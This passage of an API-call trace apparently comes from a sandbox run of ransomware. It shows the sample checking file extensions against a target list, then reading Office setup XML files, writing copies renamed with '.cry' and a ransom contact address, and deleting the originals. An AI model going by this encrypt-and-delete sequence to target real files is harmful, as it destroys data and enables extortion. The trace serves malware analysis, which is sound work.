(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 1 [0040.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.858] lstrlenW (lpString=".doc") returned 4 [0040.858] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.858] lstrlenW (lpString=".docx") returned 5 [0040.858] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.858] lstrlenW (lpString=".pdf") returned 4 [0040.858] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.858] lstrlenW (lpString=".xls") returned 4 [0040.858] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.858] lstrlenW (lpString=".xlsx") returned 5 [0040.858] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.858] lstrlenW (lpString=".ppt") returned 4 [0040.859] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.859] lstrlenW (lpString=".zip") returned 4 [0040.859] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.859] lstrlenW (lpString=".rar") returned 4 [0040.859] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString=".bz2") returned 4 [0040.859] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString=".7z") returned 3 [0040.859] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.859] lstrlenW (lpString=".dbf") returned 4 [0040.859] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.859] lstrlenW (lpString=".1cd") returned 4 [0040.859] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.859] lstrlenW (lpString=".jpg") returned 4 [0040.859] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.859] lstrlenW (lpString=".doc") returned 4 [0040.859] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString=".docx") returned 5 [0040.859] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.859] lstrlenW (lpString=".pdf") returned 4 [0040.859] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString=".xls") returned 4 [0040.859] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString=".xlsx") returned 5 [0040.859] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.859] lstrlenW (lpString=".ppt") returned 4 [0040.859] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.859] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.859] lstrlenW (lpString=".zip") returned 4 [0040.859] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.859] lstrlenW (lpString=".rar") returned 4 [0040.860] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.860] lstrlenW (lpString=".bz2") returned 4 [0040.860] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.860] lstrlenW (lpString=".7z") returned 3 [0040.860] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.860] lstrlenW (lpString=".dbf") returned 4 [0040.860] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.860] lstrlenW (lpString=".1cd") returned 4 [0040.860] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.860] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103 [0040.860] lstrlenW (lpString=".jpg") returned 4 [0040.860] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.860] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.860] lstrlenW (lpString="Proofing.XML") returned 12 [0040.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0040.862] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=811) returned 1 [0040.862] CloseHandle (hObject=0x1cc) returned 1 [0040.862] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 0x20 [0040.862] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.862] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0040.862] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.862] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0040.863] GetLastError () returned 0x0 [0040.863] ReadFile (in: hFile=0x1cc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x32b, lpOverlapped=0x0) returned 1 [0041.167] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x330, lpOverlapped=0x0) returned 1 [0041.176] ReadFile (in: hFile=0x1cc, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.176] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0041.176] SetEndOfFile (hFile=0x1c0) returned 1 [0041.176] CloseHandle (hObject=0x1c0) returned 1 [0041.177] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.177] SetEndOfFile (hFile=0x1cc) returned 1 [0041.178] CloseHandle (hObject=0x1cc) returned 1 [0041.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.178] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proofing.en-us\\proofing.xml")) returned 1 [0041.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.178] lstrlenW (lpString=".doc") returned 4 [0041.178] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.178] lstrlenW (lpString=".docx") returned 5 [0041.178] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0041.178] lstrlenW (lpString=".pdf") returned 4 [0041.178] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.178] lstrlenW (lpString=".xls") returned 4 [0041.178] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.178] lstrlenW (lpString=".xlsx") returned 5 [0041.178] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0041.178] lstrlenW (lpString=".ppt") returned 4 [0041.179] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.179] lstrlenW (lpString=".zip") returned 4 [0041.179] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.179] lstrlenW (lpString=".rar") returned 4 [0041.179] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString=".bz2") returned 4 [0041.179] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString=".7z") returned 3 [0041.179] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.179] lstrlenW (lpString=".dbf") returned 4 [0041.179] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.179] lstrlenW (lpString=".1cd") returned 4 [0041.179] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.179] lstrlenW (lpString=".jpg") returned 4 [0041.179] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.179] lstrlenW (lpString=".doc") returned 4 [0041.179] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString=".docx") returned 5 [0041.179] lstrcmpiW (lpString1=".docx", lpString2="g.XML") returned -1 [0041.179] lstrlenW (lpString=".pdf") returned 4 [0041.179] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString=".xls") returned 4 [0041.179] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString=".xlsx") returned 5 [0041.179] lstrcmpiW (lpString1=".xlsx", lpString2="g.XML") returned -1 [0041.179] lstrlenW (lpString=".ppt") returned 4 [0041.179] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.179] lstrlenW (lpString=".zip") returned 4 [0041.179] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.179] lstrlenW (lpString=".rar") returned 4 [0041.180] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.180] lstrlenW (lpString=".bz2") returned 4 [0041.180] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.180] lstrlenW (lpString=".7z") returned 3 [0041.180] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.180] lstrlenW (lpString=".dbf") returned 4 [0041.180] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.180] lstrlenW (lpString=".1cd") returned 4 [0041.180] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Proofing.en-us\\Proofing.XML") returned 107 [0041.180] lstrlenW (lpString=".jpg") returned 4 [0041.180] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.180] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.180] lstrlenW (lpString="SETUP.XML") returned 9 [0041.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0041.240] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1608) returned 1 [0041.240] CloseHandle (hObject=0x1c0) returned 1 [0041.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 0x20 [0041.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.241] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0041.241] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.241] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.241] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0041.241] GetLastError () returned 0x0 [0041.241] ReadFile (in: hFile=0x1c0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x648, lpOverlapped=0x0) returned 1 [0041.348] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x650, lpOverlapped=0x0) returned 1 [0041.348] ReadFile (in: hFile=0x1c0, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.348] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.349] SetEndOfFile (hFile=0x180) returned 1 [0041.349] CloseHandle (hObject=0x180) returned 1 [0041.349] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.349] SetEndOfFile (hFile=0x1c0) returned 1 [0041.350] CloseHandle (hObject=0x1c0) returned 1 [0041.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0041.350] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\publisher.en-us\\setup.xml")) returned 1 [0041.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.350] lstrlenW (lpString=".doc") returned 4 [0041.350] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.350] lstrlenW (lpString=".docx") returned 5 [0041.350] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.350] lstrlenW (lpString=".pdf") returned 4 [0041.350] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.350] lstrlenW (lpString=".xls") returned 4 [0041.351] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString=".xlsx") returned 5 [0041.351] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.351] lstrlenW (lpString=".ppt") returned 4 [0041.351] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.351] lstrlenW (lpString=".zip") returned 4 [0041.351] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.351] lstrlenW (lpString=".rar") returned 4 [0041.351] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString=".bz2") returned 4 [0041.351] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString=".7z") returned 3 [0041.351] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.351] lstrlenW (lpString=".dbf") returned 4 [0041.351] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.351] lstrlenW (lpString=".1cd") returned 4 [0041.351] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.351] lstrlenW (lpString=".jpg") returned 4 [0041.351] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.351] lstrlenW (lpString=".doc") returned 4 [0041.351] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString=".docx") returned 5 [0041.351] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.351] lstrlenW (lpString=".pdf") returned 4 [0041.351] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString=".xls") returned 4 [0041.351] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString=".xlsx") returned 5 [0041.351] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.351] lstrlenW (lpString=".ppt") returned 4 [0041.351] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.351] lstrlenW (lpString=".zip") returned 4 [0041.352] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.352] lstrlenW (lpString=".rar") returned 4 [0041.352] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.352] lstrlenW (lpString=".bz2") returned 4 [0041.352] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.352] lstrlenW (lpString=".7z") returned 3 [0041.352] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.352] lstrlenW (lpString=".dbf") returned 4 [0041.352] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.352] lstrlenW (lpString=".1cd") returned 4 [0041.352] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Publisher.en-us\\SETUP.XML") returned 105 [0041.352] lstrlenW (lpString=".jpg") returned 4 [0041.352] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.352] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0041.352] lstrlenW (lpString="SETUP.XML") returned 9 [0041.352] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0041.353] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=2424) returned 1 [0041.353] CloseHandle (hObject=0x190) returned 1 [0041.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 0x20 [0041.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0041.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0041.353] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.353] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0041.354] GetLastError () returned 0x0 [0041.354] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x978, lpOverlapped=0x0) returned 1 [0041.363] WriteFile (in: hFile=0x1c0, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x980, lpOverlapped=0x0) returned 1 [0041.364] 